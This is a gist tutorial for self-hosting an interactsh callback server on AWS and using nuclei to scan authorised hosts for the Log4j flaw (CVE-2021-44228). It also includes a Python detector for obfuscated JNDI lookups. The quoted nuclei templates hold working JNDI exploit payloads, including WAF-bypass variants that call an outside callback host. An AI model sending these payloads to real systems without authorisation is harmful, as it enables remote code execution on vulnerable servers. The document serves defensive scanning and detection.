
@mbrownnycnyc
Last active September 11, 2024 06:05
nuclei install on Kali (for Log4j / CVE-2021-44228 scanning). This is in draft as of 12/17/2021.

stand up an interactsh server on AWS (Amazon Linux)

  1. Stand up a domain you control and can delegate. In this case I'll use digiarch.net, since I own it and use it for nothing else.

  2. Stand up an Amazon Linux EC2 instance. Configure its security group to allow the following inbound (interactsh answers DNS itself, and DNS is also what the Let's Encrypt DNS-01 challenge checks):

    • tcp 25: SMTP
    • udp 53: DNS
    • tcp 80: HTTP
    • tcp 443: HTTPS
    • tcp 465: SMTPS
    • tcp 587: SMTP STARTTLS
  3. install go and ncat. (`sudo echo ... >> /etc/profile.d/go.sh` does not work: sudo applies to echo, the redirect still runs as your user and is denied, so write the file with `tee`.)

    sudo yum groupinstall "Development Tools" -y
    sudo yum install nmap-ncat -y
    cd /usr/local
    sudo wget https://go.dev/dl/go1.17.5.linux-amd64.tar.gz
    # compare `sha256sum go1.17.5.linux-amd64.tar.gz` with the checksum listed on https://go.dev/dl/ before extracting
    sudo tar -zxvf go*linux-amd64.tar.gz
    # single quotes keep $PATH/$HOME unexpanded until the profile is sourced at login
    echo 'export PATH=$PATH:/usr/local/go/bin' | sudo tee /etc/profile.d/go.sh
    echo 'export GOPATH=$HOME/go' | sudo tee -a /etc/profile.d/go.sh
    source /etc/profile.d/go.sh
    go version
    
    
  4. install certbot

    yum install pip -y #yea py2 is installed on the AMI I used at least
    pip install virtualenv
    virtualenv ~/.certbot
    source ~/.certbot/bin/activate
    pip install 'setuptools<41'
    pip install certbot
    pip install 'parsedatetime<2.6'
    deactivate
    
  5. Generate a wildcard cert. #note that this is a workaround (see projectdiscovery/interactsh#127): the cert is issued through a manual DNS-01 challenge before the zone is delegated to interactsh

    source ~/.certbot/bin/activate
    # quote the wildcard so the shell does not glob it
    certbot certonly --manual -d '*.digiarch.net' --agree-tos \
    --no-bootstrap --manual-public-ip-logging-ok --preferred-challenges dns-01 \
    -m [email protected]  \
    --server https://acme-v02.api.letsencrypt.org/directory
    
    # certbot prints a challenge value; create a TXT record with it (the value below is a placeholder)
    _acme-challenge.digiarch.net.	900	TXT	"M3Ckm1T-yeanah"
    
    # verify the record is visible from the outside (e.g. https://unboundtest.com/) before telling certbot to continue
    
    # once verified... continue. Renew later with `certbot renew` inside the same virtualenv; a manually
    # validated cert will need a fresh TXT value each time (or a --manual-auth-hook script).
    # /etc/letsencrypt/live/digiarch.net/fullchain.pem
    # /etc/letsencrypt/live/digiarch.net/privkey.pem
    # leave the virtualenv
    deactivate
    # link the cert and key into the interactsh config dir (create it first, or ln fails)
    sudo mkdir -p /root/.config/interactsh
    sudo ln -s /etc/letsencrypt/live/digiarch.net/fullchain.pem /root/.config/interactsh/cert.crt
    sudo ln -s /etc/letsencrypt/live/digiarch.net/privkey.pem /root/.config/interactsh/cert.key
    
    
  6. install the interactsh client and server

    go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
    go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-server@latest
    
  7. Add two A records (ns1 and ns2) in your master zone pointing at the EC2 instance's public IP address.

    • This step and the next two only matter once the dns-01 Let's Encrypt validation has worked for you (the cert is issued before delegation).
  8. Add two NS records in your master zone pointing at the ns1/ns2 names you just created.

  9. Resulting zone (the _acme-challenge TXT record from step 5 lives in this zone too)

    I use dollardns.net, which lets me edit the BIND zone directly:

    digiarch.net.	900	SOA	ns1.dollardns.net. info\@talconst.com. 2021122005 1800 21600 2419200 300
    digiarch.net.	172800	NS	ns1.digiarch.net.
    digiarch.net.	172800	NS	ns2.digiarch.net.
    ns1.digiarch.net.	900	A	3.88.84.84
    ns2.digiarch.net.	900	A	3.88.84.84

    Because this delegates the zone apex, the NS change also has to be made at the registrar (with glue A records for ns1/ns2), not only inside the dollardns zone file; `dig +trace NS digiarch.net` shows which servers the parent actually hands out. Once the delegation is live, resolvers ask interactsh for every digiarch.net name, the _acme-challenge TXT record at renewal time included.
    
  10. run the interactsh server on the EC2 instance (binding 25/53/80/443 needs root or CAP_NET_BIND_SERVICE):

    # cert can be configured: "/root/.config/interactsh/cert.crt" (and cert.key) from step 5
    # -auth makes the server generate a client token and print it in its log; keep it, interactsh-client and nuclei need it
    /home/ec2-user/go/bin/interactsh-server -domain digiarch.net -auth -debug -listen-ip $(hostname -i)
    

install go (on kali)

* https://rafaelhart.com/2020/03/installing-golang-on-kali-linux/
sudo apt install -y golang
echo export PATH=$HOME/go/bin:/usr/lib/go/bin:$PATH >> ~/.bashrc
source ~/.bashrc
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest

use nuclei

which nuclei
nuclei -h

update templates natively

# the subcommand form `nuclei update-templates` is not a nuclei flag; the flag is -update-templates (short: -ut)
# this doesn't appear to pull from the repo https://github.com/projectdiscovery/nuclei-templates/search?q=log4j
nuclei -update-templates

list log4j related templates

nuclei -tl 2>&1 | egrep '(log4j|log4shell)'
# -tl only prints template paths, so grep the template bodies to actually list everything that mentions log4j. el oh el
grep -lr "log4j" ~/nuclei-templates

download a template

# curl -O and -o conflict, and -o needs a file name, not a directory.
# Read any third-party template before running it: it decides what is sent to every target.
curl -o ~/nuclei-templates/vulnerabilities/log4j-rce-detect-waf-bypass.yaml https://raw.githubusercontent.com/toramanemre/log4j-rce-detect-waf-bypass/main/log4j-rce-detect-waf-bypass.yaml

locate the template

nuclei -tl 2>&1 | egrep 'log4j-rce-detect-waf-bypass'

validate the template (give -t the template path, not just the id)

nuclei -t ~/nuclei-templates/vulnerabilities/log4j-rce-detect-waf-bypass.yaml -validate


cat log4j-rce-detect-waf-bypass.yaml
id: log4j-rce-detect-waf-bypass

info:
  name: Apache Log4j RCE (CVE-2021-44228) Detection with WAF Bypass (CloudFlare etc.)
  author: toramanemre

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?q=${jndi:ldap://{{interactsh-url}}/poc}"
      - "{{BaseURL}}/?q=${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}"  # "/" before poc was missing
      - "{{BaseURL}}/?q=${${::-j}ndi:rmi://{{interactsh-url}}/poc}"
      - "{{BaseURL}}/?q=${jndi:rmi://{{interactsh-url}}}"
      - "{{BaseURL}}/?q=${${lower:jndi}:${lower:rmi}://{{interactsh-url}}/poc}"
      - "{{BaseURL}}/?q=${${lower:${lower:jndi}}:${lower:rmi}://{{interactsh-url}}/poc}"
      - "{{BaseURL}}/?q=${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{{interactsh-url}}/poc}"
      - "{{BaseURL}}/?q=${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://{{interactsh-url}}/poc}"  # stray "}" after ${lower:i} removed; it closed the lookup before the URL

    headers:
      Host: "{{Host}}"

    matchers:
      - type: word
        part: interactsh_protocol
        name: dns
        words:
          - "dns"

breakdown this template

  1. refer to https://nuclei.projectdiscovery.io/templating-guide/protocols/http/
{{BaseURL}} - This will replace on runtime in the request by the input URL as specified in the target file.

  2. refer to https://nuclei.projectdiscovery.io/templating-guide/interactsh/
Since release of Nuclei v2.3.6, Nuclei supports using the interact.sh API to achieve OOB based vulnerability scanning with automatic Request correlation built in. It's as easy as writing {{interactsh-url}} anywhere in the request, and adding a matcher for interact_protocol. Nuclei will handle correlation of the interaction to the template & the request it was generated from allowing effortless OOB scanning.
  • Because we do not trust interact.sh, we will not send callbacks to the public interact.sh servers. Hard-coding an arbitrary domain into the request, as in the edited copy below, has a cost: without {{interactsh-url}} nuclei never registers a session, so the interactsh_protocol matcher can never fire, nuclei reports nothing, and the only evidence is whatever DNS/LDAP/RMI logs the domain's authoritative server keeps. The domain used below, winter2021notrealnotdomainsquattedredbluegreen.com, is a made-up placeholder nobody answers for. The supported way to stay off interact.sh is to keep {{interactsh-url}} in the template and point nuclei at the self-hosted server from the first section (-iserver https://digiarch.net -itoken <token printed by interactsh-server -auth>).
  3. edit the template (shown as edited; see the note above):
cat redbluegreenlog4j-rce-detect-waf-bypass.yaml
id: log4j-rce-detect-waf-bypass

info:
  name: Apache Log4j RCE (CVE-2021-44228) Detection with WAF Bypass (CloudFlare etc.)
  author: toramanemre

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?q=${jndi:ldap://winter2021notrealnotdomainsquattedredbluegreen.com/poc}"
      - "{{BaseURL}}/?q=${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://winter2021notrealnotdomainsquattedredbluegreen.com/poc}"  # "/" before poc was missing
      - "{{BaseURL}}/?q=${${::-j}ndi:rmi://winter2021notrealnotdomainsquattedredbluegreen.com/poc}"
      - "{{BaseURL}}/?q=${jndi:rmi://winter2021notrealnotdomainsquattedredbluegreen.com}"
      - "{{BaseURL}}/?q=${${lower:jndi}:${lower:rmi}://winter2021notrealnotdomainsquattedredbluegreen.com/poc}"
      - "{{BaseURL}}/?q=${${lower:${lower:jndi}}:${lower:rmi}://winter2021notrealnotdomainsquattedredbluegreen.com/poc}"
      - "{{BaseURL}}/?q=${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://winter2021notrealnotdomainsquattedredbluegreen.com/poc}"
      - "{{BaseURL}}/?q=${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://winter2021notrealnotdomainsquattedredbluegreen.com/poc}"  # stray "}" after ${lower:i} removed

    headers:
      Host: "{{Host}}"

    matchers:
      - type: word
        part: interactsh_protocol
        name: dns
        words:
          - "dns"
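The obfuscated forms in the template above (${::-j}, ${lower:...}, ${upper:...}, nested lookups) are what a WAF, or a log-based detection, has to see through. As an added example, not code from this gist or from nuclei/interactsh, the Python below resolves log4j 2 lookups innermost-first the way StrSubstitutor/Interpolator do for these operators, then checks whether the result is a ${jndi:...} lookup. The payloads and access-log lines it scans are constructed for illustration, and interact.example is a stand-in for an interactsh host.

```python
"""De-obfuscate log4j 2 lookup strings and flag ${jndi:...} lookups.

Added example for this page, not code from the gist or from nuclei/interactsh.
Sample payloads and log lines below are constructed; interact.example is a
stand-in for an interactsh host.
"""
import re
from urllib.parse import unquote

JNDI_RE = re.compile(r"\$\{jndi:", re.IGNORECASE)


def _matching_brace(s: str, start: int) -> int:
    """Index of the '}' closing the '${' that ends at `start`, or -1 if unterminated."""
    depth = 1
    i = start
    while i < len(s):
        if s.startswith("${", i):
            depth += 1
            i += 2
            continue
        if s[i] == "}":
            depth -= 1
            if depth == 0:
                return i
        i += 1
    return -1


def _resolve(body: str) -> str:
    """Resolve one lookup whose nested lookups are already expanded.

    Mirrors the pieces of log4j's StrSubstitutor/Interpolator the bypass payloads
    rely on: ':-' is the default-value delimiter, the prefix before ':' is
    lower-cased, and lower/upper transform their key. Anything else either falls
    back to its default (so ${::-j} becomes 'j') or is left as written.
    """
    name, has_default, default = body.partition(":-")
    prefix, has_prefix, key = name.partition(":")
    prefix = prefix.lower()
    if has_prefix and prefix == "lower":
        return key.lower()
    if has_prefix and prefix == "upper":
        return key.upper()
    if has_prefix and prefix == "jndi":
        return "${" + name + "}"           # the sink: keep it visible for matching
    if has_default:
        return default                     # unknown lookup with a default value
    return "${" + body + "}"               # unresolvable: log4j leaves it in place


def expand(s: str) -> str:
    """Expand nested ${...} lookups innermost-first and return the resolved string."""
    out = []
    i = 0
    while i < len(s):
        if s.startswith("${", i):
            end = _matching_brace(s, i + 2)
            if end == -1:                  # unterminated lookup: treat the rest literally
                out.append(s[i:])
                break
            out.append(_resolve(expand(s[i + 2:end])))
            i = end + 1
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def is_log4shell(line: str) -> bool:
    """True if the line, percent-decoded once and de-obfuscated, contains a ${jndi:...} lookup."""
    return JNDI_RE.search(expand(unquote(line))) is not None


def scan_log(lines):
    """Return [(line_number, expanded_line)] for every line that carries a JNDI lookup."""
    return [(n, expand(unquote(l))) for n, l in enumerate(lines, 1) if is_log4shell(l)]


# Constructed access-log lines: the template's payload shapes, one percent-encoded, two benign.
SAMPLE_LOG = [
    'GET /?q=${jndi:ldap://interact.example/poc} HTTP/1.1',
    'GET /?q=${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://interact.example/poc} HTTP/1.1',
    'GET /?q=${${lower:${lower:jndi}}:${lower:rmi}://interact.example/poc} HTTP/1.1',
    'GET /?q=${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://interact.example/poc} HTTP/1.1',
    'GET /?q=%24%7Bjndi%3Armi%3A%2F%2Finteract.example%2Fpoc%7D HTTP/1.1',
    'GET /?q=${lower:HELLO} HTTP/1.1',
    'GET /search?q=jndi+tutorial HTTP/1.1',
]

if __name__ == "__main__":
    for n, resolved in scan_log(SAMPLE_LOG):
        print(f"line {n}: {resolved}")
```

The scanner percent-decodes once; doubly encoded payloads, or lookups split across headers, need the same decoding applied to each field before the expansion step.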

execute the template

  1. generate a list of target sites (only hosts you are authorized to test) and put them in fqdns.txt, one per line:
https://fqdnone.com
https://fqdntwo.com
  2. execute the hard-coded-domain copy (nuclei itself will report nothing; hits only show up in the DNS logs for that domain):
nuclei -t ~/nuclei-templates/vulnerabilities/redbluegreenlog4j-rce-detect-waf-bypass.yaml -l fqdns.txt -debug -vv
  3. or run the unmodified template against the self-hosted interactsh server, so the interactsh_protocol matcher can correlate callbacks to requests:
nuclei -t ~/nuclei-templates/vulnerabilities/log4j-rce-detect-waf-bypass.yaml -l fqdns.txt -iserver https://digiarch.net -itoken <token printed by interactsh-server -auth> -debug -vv